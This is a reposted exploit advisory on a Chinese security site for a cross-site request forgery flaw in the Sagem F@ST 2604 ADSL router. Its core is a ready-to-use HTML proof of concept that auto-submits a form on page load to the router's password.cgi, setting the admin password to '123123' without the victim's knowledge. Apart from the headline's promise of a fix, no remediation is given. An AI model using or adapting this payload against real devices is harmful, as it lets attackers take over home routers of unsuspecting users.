Sagem F@ST 2604 (ADSL Router)CSRF缺陷及修复

Sagem F@ST 2604 (ADSL Router)CSRF缺陷及修复 - 网站安全

来源：自学PHP网时间：2015-04-17 13:03 作者：阅读:次

[导读] |__| | | |__| |__| |__| |_/ |__] |__| |__/| | |___ |___ | | | | | | | \_ |__] | | | \================================================================================####标......

|__| | | |__| |__| |__| |_/ |__] |__| |__/
| | |___ |___ | | | | | | | \_ |__] | | | \
================================================================================
####
标题: Sagem F@ST 2604 CSRF Vulnerability (ADSL Router)
作者: KinG Of PiraTeS www.2cto.com t5r@hotmail.com
开发网站: http://www.sagem.com/index.php
影响版本: 253180972B May be Other Version are Affected
测试平台: [Windows 7 Edition Intégrale]
####
##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |

1)介绍
2)缺陷描述
3)测试示例
>> ----------------------------------------------------------------
1)介绍
The Sagemcom F@st 2604 is a wireless ADSL2/2+ router with one RJ-11 WAN port and four 10/100Base-T LAN ports.
2)缺陷描述
From SAGEM F@st 2604 U can change the default "Admin" password Or Any User Password which is listening on tcp/ip port 80
或许其他的版本也受影响
3)测试示例
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>Password successfully changed [CSRF Exploit change ADMIN password]</H2>
<form method="POST" name="form0" action="http://www.2cto.com /password.cgi?sysPassword=123123">
</form>
</body>
</html>
-
123123就是新密码
-
####
Peace From Algeria

人人网照片评论的表结构泄漏及修复 - 网站安全

BRIM < 2.0.0 SQL注射缺陷及修复 - 网站安全 - 自学

子栏目

Sagem F@ST 2604 (ADSL Router)CSRF缺陷及修复 - 网站安全

最新评论

添加评论

更多文章推荐

添加评论